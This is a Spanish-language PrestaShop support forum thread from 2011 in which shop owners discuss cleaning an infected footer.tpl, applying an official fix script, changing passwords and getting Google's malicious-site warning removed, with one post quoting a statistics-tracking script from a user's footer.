1) Mi tienda no ha sido afectada, es necesario realizar este proceso?.

 

Todas las versiones 1.4 necesitan aplicar la revisión. Es decir el proceso de descargar y ejecutar el archivo herfix publicado por Prestashop. Incluso si su tienda no ha sido infectada.

 

También es necesario, que se cambien las contraseñas de la base de datos, de los empleados y administradores de la tienda.

 

2) He utilizado otro método para resolver el problema que no es el de esta guía. Mi tienda funciona perfectamente, ¿debo yo seguir y realizar esta solución?.

 

Sí, debe utilizar esta solución.

 

Y esto solo lo ponen en español? en inglés no dicen nada al respecto? si se supone que ha sido a través de sus servidores y no han accedido a través de las propias tiendas no debería actualizar como se indica ahí, a no ser que haya más cosas....

 

No obstante pienso que Prestashop se pronunciará al respecto de manera oficial en algun mail con la solución definitiva o con más información del mismo modo que nos avisó de la infección, no?

Link to comment
Share on other sites

No obstante pienso que Prestashop se pronunciará al respecto de manera oficial en algun mail con la solución definitiva o con más información del mismo modo que nos avisó de la infección, no?

Ya lo ha hecho, pasate por aquí:

Por favor, lea esto. Procedimiento de seguridad.

 

Las preguntas las podéis realizar a partir de ahora en ese Hilo que es el Oficial.

 

Este Hilo puede abandonarse, si así lo queréis.

 

Un saludo.

Link to comment
Share on other sites

el footer.tpl de mi theme es el que está dañado?

Lo que me extraña es que hayas seguido bien la guia y sigas con el footer infectado.

 

Debo suponer, que el archivo herfix lo que hace es eliminar todo el código malicioso. Pero como no lo tengo claro, mejor que alguien te conteste, o si no directamente le preguntaré a Carl.

Link to comment
Share on other sites

tengo el footer.tpl limpio ya, alguien me lo puede verificar?

 

Uso debian y aquí es poco usual un antivirus.

Yo personalmente no puedo verificartelo, porque tu tienda ha sido bloqueada por Google y no permite acceder a ella.

 

Pero supongo que descargando el archivo footer.tpl por FTP a tu ordenador, podrás observar si ves algún código extraño.

Link to comment
Share on other sites

tengo el footer.tpl limpio ya, alguien me lo puede verificar?

 

Uso debian y aquí es poco usual un antivirus.

Yo personalmente no puedo verificartelo, porque tu tienda ha sido bloqueada por Google y no permite acceder a ella.

 

Pero supongo que descargando el archivo footer.tpl por FTP a tu ordenador, podrás observar si ves algún código extraño.

 

Si entras directamente sí: http://home-pc.es

Link to comment
Share on other sites

tengo el footer.tpl limpio ya, alguien me lo puede verificar?

 

Uso debian y aquí es poco usual un antivirus.

Yo personalmente no puedo verificartelo, porque tu tienda ha sido bloqueada por Google y no permite acceder a ella.

 

Pero supongo que descargando el archivo footer.tpl por FTP a tu ordenador, podrás observar si ves algún código extraño.

 

Si entras directamente sí: http://home-pc.es

No, a mi por lo menos no me lo permite. ¿No tendrás guardada tu web en la caché del navegador?. Elimina los archivos temporales de Internet, porque a mí no me deja acceder a tu tienda.

 

¡Este sitio es una web atacante!, eso es lo que me aparece.

Link to comment
Share on other sites

tengo el footer.tpl limpio ya, alguien me lo puede verificar?

 

Uso debian y aquí es poco usual un antivirus.

Yo personalmente no puedo verificartelo, porque tu tienda ha sido bloqueada por Google y no permite acceder a ella.

 

Pero supongo que descargando el archivo footer.tpl por FTP a tu ordenador, podrás observar si ves algún código extraño.

 

Si entras directamente sí: http://home-pc.es

No, a mi por lo menos no me lo permite. ¿No tendrás guardada tu web en la caché del navegador?. Elimina los archivos temporales de Internet, porque a mí no me deja acceder a tu tienda.

 

¡Este sitio es una web atacante!, eso es lo que me aparece.

Estoy actualizando a la 1.4.4 haber si soluciono.

Link to comment
Share on other sites

Estoy actualizando a la 1.4.4 haber si soluciono.

Si estás actualizando la tienda a la versión 1.4.4 por el mensaje que aparece en Google, no hace falta que lo hagas. Simplemente ponte en contacto con ellos para que revisen tu web y quiten ese aviso de que tu web es atacante.

 

De todas formas, es mejor que tengas tu tienda actualizada. Así que está muy bien lo que estás haciendo ;)

Link to comment
Share on other sites

Estoy actualizando a la 1.4.4 haber si soluciono.

Si estás actualizando la tienda a la versión 1.4.4 por el mensaje que aparece en Google, no hace falta que lo hagas. Simplemente ponte en contacto con ellos para que revisen tu web y quiten ese aviso de que tu web es atacante.

 

De todas formas, es mejor que tengas tu tienda actualizada. Así que está muy bien lo que estás haciendo ;)

 

Cómo le digo a google que ya no tengo nada. y alguien me puede verificar que no tenga nada?

Link to comment
Share on other sites

Buenos dias. A todos.... Esta madrugada he recibido un mail de prestashop informandome de la incidencia y me he alarmado un poco. De momento he revisado mis webs y no encuentro ningun problema.

 

Mi duda es ¿Es necesario instalar el parche que ha sacado prestashop? ¿Si no estamos infectados debemos de tomar alguna medida adicional de seguridad a las normales??

 

Gracias a todos..

 

Hola,

 

Si tienes Prestashop 1.4.x, si hay que hacerlo.

 

Cordial saludo.

Link to comment
Share on other sites

Estoy actualizando a la 1.4.4 haber si soluciono.

Si estás actualizando la tienda a la versión 1.4.4 por el mensaje que aparece en Google, no hace falta que lo hagas. Simplemente ponte en contacto con ellos para que revisen tu web y quiten ese aviso de que tu web es atacante.

 

De todas formas, es mejor que tengas tu tienda actualizada. Así que está muy bien lo que estás haciendo ;)

 

Cómo le digo a google que ya no tengo nada. y alguien me puede verificar que no tenga nada?

 

 

Buenos dias. Para indicar a Google que ya no tienes nada de Malware en la web, debes de entrar en HERRAMIENTAS PARA WEBMASTERS de GOOGLE, tendras que darte de alta y verificar que la web es tuya. Posteriormente debes de solicitar una revision y ellos te desbloqueran la web de como peligrosa.

 

Es importante que estes seguro de que has limpiado bien todo antes de solicitar la revision a Google.

Espero te sea de ayuda.

Gracias.

Link to comment
Share on other sites

Sí sí eso si lo he visto :D

Google Chrome también permite la entrada a tu web.

Supongo que Google tardará un tiempo en dar tu web como buena.

 

He revisado el footer y no veo el código antes que te han indicado que era peligroso.

 

El único código que he visto que no se de donde sale es:

<div id="footer"><script type="text/javascript">/* <![CDATA[ */
var time_start;$(window).load(function(){time_start=new Date();});$(window).unload(function(){var time_end=new Date();var pagetime=new Object;pagetime.type="pagetime";pagetime.id_connections="69220";pagetime.id_page="1";pagetime.time_start="2011-08-25 13:47:27";pagetime.token="25ab3a26a41266a8d7d368f28eea27ed12b44fd9";pagetime.time=time_end-time_start;$.post("http://home-pc.es/statistics.php",pagetime);});/* ]]> */</script></div>

 

Pero debo suponer que ese código pertenece a algún modulo o extra que hayas metido.

 

O bien, es una plantilla que has comprado que trae ese código por defecto.

Link to comment
Share on other sites

Sí sí eso si lo he visto :D

Google Chrome también permite la entrada a tu web.

Supongo que Google tardará un tiempo en dar tu web como buena.

 

He revisado el footer y no veo el código antes que te han indicado que era peligroso.

 

El único código que he visto que no se de donde sale es:

<div id="footer"><script type="text/javascript">/* <![CDATA[ */
var time_start;$(window).load(function(){time_start=new Date();});$(window).unload(function(){var time_end=new Date();var pagetime=new Object;pagetime.type="pagetime";pagetime.id_connections="69220";pagetime.id_page="1";pagetime.time_start="2011-08-25 13:47:27";pagetime.token="25ab3a26a41266a8d7d368f28eea27ed12b44fd9";pagetime.time=time_end-time_start;$.post("http://home-pc.es/statistics.php",pagetime);});/* ]]> */</script></div>

 

Pero debo suponer que ese código pertenece a algún modulo o extra que hayas metido.

 

O bien, es una plantilla que has comprado que trae ese código por defecto.

No pertenece a la plantilla original

Link to comment
Share on other sites

Nosotros hemos realizado la desinfección tal y como se indica, pero sigue sin funcionarnos el live edit, la caja de categorias cuando quiere se borra.... El famoso puntito negro del footer, me ha aparecido cuando he ejecutado el archivo herfix.php y ahora cada vez qeu navegas por la tienda online, veo en la barra de estado que se conecta con paginas como http://www.ripway.com/'>http://www.ripway.com/ y www.fileave.com ???????

 

We have made out disinfection as indicated, but still does not work live edit, and the category box appears in blanck .... The famous black dot in the footer, appeared to me when I run the file herfix.php, I see in the status bar that connects to pages like http://www.ripway.com / and www.fileave.com ???????

Link to comment
Share on other sites

Nosotros hemos realizado la desinfección tal y como se indica, pero sigue sin funcionarnos el live edit, la caja de categorias cuando quiere se borra.... El famoso puntito negro del footer, me ha aparecido cuando he ejecutado el archivo herfix.php y ahora cada vez qeu navegas por la tienda online, veo en la barra de estado que se conecta con paginas como http://www.ripway.com/'>http://www.ripway.com/ y www.fileave.com ???????

 

We have made out disinfection as indicated, but still does not work live edit, and the category box appears in blanck .... The famous black dot in the footer, appeared to me when I run the file herfix.php, I see in the status bar that connects to pages like http://www.ripway.com / and www.fileave.com ???????

 

SE ME PASABA!! A nosotros nos ha ocurrido en un prestashop standar, sin ningun modulo de terceros ni nada!! y estando la tienda en offline.

 

Salut

Link to comment
Share on other sites

Hola Otra vez,

 

Tras realizar el herfix.php me he dado cuenta que el codigo del footer sigue estando, un javascript o un dBASE....

 

He machacado el footer con el antiguo y funciona a la perfección tanto el live edit como el box de categorias!!

 

Saludos

 

jorge

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...